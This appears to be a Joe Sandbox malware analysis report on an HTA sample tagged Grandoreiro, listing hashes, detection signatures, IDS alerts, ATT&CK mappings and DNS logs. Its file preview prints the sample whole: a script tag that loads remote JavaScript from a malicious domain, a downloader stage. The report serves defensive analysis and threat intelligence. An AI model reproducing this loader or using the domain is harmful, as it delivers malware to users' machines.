Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ocyMAsPrHV.hta

Overview

General Information

Sample name:ocyMAsPrHV.hta
renamed because original name is a hash value
Original sample name:eaaae627c7132407cc3c5ce97185fcb5.hta
Analysis ID:1546605
MD5:eaaae627c7132407cc3c5ce97185fcb5
SHA1:e0864843dfae0a1e05d7bd959280ac23acada77b
SHA256:e32cfcf494b591446f54a36f37ecc401dcdf6be3dddb076b521c385cb5dbf6af
Tags:Grandoreirohtauser-abuse_ch
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Suricata IDS alerts with low severity for network traffic
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Classification

  • System is w10x64
  • mshta.exe (PID: 5740 cmdline: mshta.exe "C:\Users\user\Desktop\ocyMAsPrHV.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-01T08:34:17.677721+010020229301A Network Trojan was detected4.175.87.197443192.168.2.649767TCP
2024-11-01T08:34:55.590319+010020229301A Network Trojan was detected4.175.87.197443192.168.2.649974TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://descargassdownloadmx.pro/Virustotal: Detection: 12%Perma Link
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.6:49767
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.6:49974
Source: unknownDNS traffic detected: query: descargassdownloadmx.pro replaycode: Name error (3)
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: descargassdownloadmx.pro
Source: mshta.exe, 00000000.00000002.3339580944.0000000000916000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://descargassdownloadmx.pro/
Source: mshta.exe, 00000000.00000002.3339580944.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.3339580944.000000000091C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.3339580944.0000000000892000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.3340974015.000000000493E000.00000004.00000800.00020000.00000000.sdmp, ocyMAsPrHV.htaString found in binary or memory: https://descargassdownloadmx.pro/6723637d10aa6/js/6723637d10a3e.js
Source: mshta.exe, 00000000.00000002.3339580944.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://descargassdownloadmx.pro/6723637d10aa6/js/6723637d10a3e.js0
Source: mshta.exe, 00000000.00000002.3339580944.000000000091C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://descargassdownloadmx.pro/6723637d10aa6/js/6723637d10a3e.js7?
Source: mshta.exe, 00000000.00000002.3339580944.0000000000892000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://descargassdownloadmx.pro/6723637d10aa6/js/6723637d10a3e.jsSC
Source: mshta.exe, 00000000.00000002.3339580944.000000000091C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://descargassdownloadmx.pro/6723637d10aa6/js/6723637d10a3e.jsW8
Source: mshta.exe, 00000000.00000002.3339580944.0000000000892000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://descargassdownloadmx.pro/6723637d10aa6/js/6723637d10a3e.jseL
Source: mshta.exe, 00000000.00000002.3342589797.0000000006205000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://descargassdownloadmx.pro/6723637d10aa6/js/6723637d10a3e.jsh
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal48.winHTA@1/0@1/0
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: mshta.exe, 00000000.00000002.3339580944.00000000008F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
1
DLL Side-Loading
1
DLL Side-Loading
OS Credential Dumping1
Security Software Discovery
Remote Services1
Email Collection
1
Non-Application Layer Protocol
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS Memory12
System Information Discovery
Remote Desktop ProtocolData from Removable Media1
Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
ocyMAsPrHV.hta3%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
descargassdownloadmx.pro3%VirustotalBrowse
SourceDetectionScannerLabelLink
https://descargassdownloadmx.pro/12%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
descargassdownloadmx.pro
unknown
unknownfalseunknown
NameSourceMaliciousAntivirus DetectionReputation
https://descargassdownloadmx.pro/6723637d10aa6/js/6723637d10a3e.jseLmshta.exe, 00000000.00000002.3339580944.0000000000892000.00000004.00000020.00020000.00000000.sdmpfalse
    unknown
    https://descargassdownloadmx.pro/6723637d10aa6/js/6723637d10a3e.js7?mshta.exe, 00000000.00000002.3339580944.000000000091C000.00000004.00000020.00020000.00000000.sdmpfalse
      unknown
      https://descargassdownloadmx.pro/mshta.exe, 00000000.00000002.3339580944.0000000000916000.00000004.00000020.00020000.00000000.sdmpfalseunknown
      https://descargassdownloadmx.pro/6723637d10aa6/js/6723637d10a3e.js0mshta.exe, 00000000.00000002.3339580944.00000000008CE000.00000004.00000020.00020000.00000000.sdmpfalse
        unknown
        https://descargassdownloadmx.pro/6723637d10aa6/js/6723637d10a3e.jsW8mshta.exe, 00000000.00000002.3339580944.000000000091C000.00000004.00000020.00020000.00000000.sdmpfalse
          unknown
          https://descargassdownloadmx.pro/6723637d10aa6/js/6723637d10a3e.jsmshta.exe, 00000000.00000002.3339580944.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.3339580944.000000000091C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.3339580944.0000000000892000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.3340974015.000000000493E000.00000004.00000800.00020000.00000000.sdmp, ocyMAsPrHV.htafalse
            unknown
            https://descargassdownloadmx.pro/6723637d10aa6/js/6723637d10a3e.jsSCmshta.exe, 00000000.00000002.3339580944.0000000000892000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              https://descargassdownloadmx.pro/6723637d10aa6/js/6723637d10a3e.jshmshta.exe, 00000000.00000002.3342589797.0000000006205000.00000004.00000800.00020000.00000000.sdmpfalse
                unknown
                No contacted IP infos
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1546605
                Start date and time:2024-11-01 08:33:07 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 3m 39s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:6
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:ocyMAsPrHV.hta
                renamed because original name is a hash value
                Original Sample Name:eaaae627c7132407cc3c5ce97185fcb5.hta
                Detection:MAL
                Classification:mal48.winHTA@1/0@1/0
                EGA Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Found application associated with file extension: .hta
                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target mshta.exe, PID 5740 because there are no executed function
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                No simulations
                No context
                No context
                No context
                No context
                No context
                No created / dropped files found
                File type:HTML document, ASCII text, with CRLF line terminators
                Entropy (8bit):4.85816640609784
                TrID:
                • HyperText Markup Language (12001/1) 66.65%
                • HyperText Markup Language (6006/1) 33.35%
                File name:ocyMAsPrHV.hta
                File size:141 bytes
                MD5:eaaae627c7132407cc3c5ce97185fcb5
                SHA1:e0864843dfae0a1e05d7bd959280ac23acada77b
                SHA256:e32cfcf494b591446f54a36f37ecc401dcdf6be3dddb076b521c385cb5dbf6af
                SHA512:f1c1b4917363b596d1396b0d3398e7253124da23b49e5f374530f7ac4035d95c7c3079f81be36bf46cb4f323d9b1aa6df70d4a03a4d61074c6ed8c2243c5ff51
                SSDEEP:3:qVoB3tObvrEHKJdLWSinKpfaSi0P+ZNGXIMBWhtoAcMBcacWWGb:q43tEvrBXWHnKpSH0P+ZNVMch0MWXfGb
                TLSH:A3C02B7B19008E340070F47445D0A0C98047A14F18E19407C4F0002731213D4DD43299
                File Content Preview:<html>..<head>..<script src="https://descargassdownloadmx.pro/6723637d10aa6/js/6723637d10a3e.js"></script>..</head>..<body>..</body>..</html>
                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                2024-11-01T08:34:17.677721+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.649767TCP
                2024-11-01T08:34:55.590319+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.649974TCP
                TimestampSource PortDest PortSource IPDest IP
                Nov 1, 2024 08:33:58.867446899 CET6239353192.168.2.61.1.1.1
                Nov 1, 2024 08:33:58.882600069 CET53623931.1.1.1192.168.2.6
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Nov 1, 2024 08:33:58.867446899 CET192.168.2.61.1.1.10xadd7Standard query (0)descargassdownloadmx.proA (IP address)IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Nov 1, 2024 08:33:58.882600069 CET1.1.1.1192.168.2.60xadd7Name error (3)descargassdownloadmx.prononenoneA (IP address)IN (0x0001)false

                Click to jump to process

                Click to jump to process

                Target ID:0
                Start time:03:33:57
                Start date:01/11/2024
                Path:C:\Windows\SysWOW64\mshta.exe
                Wow64 process (32bit):true
                Commandline:mshta.exe "C:\Users\user\Desktop\ocyMAsPrHV.hta"
                Imagebase:0x9c0000
                File size:13'312 bytes
                MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate
                Has exited:false

                No disassembly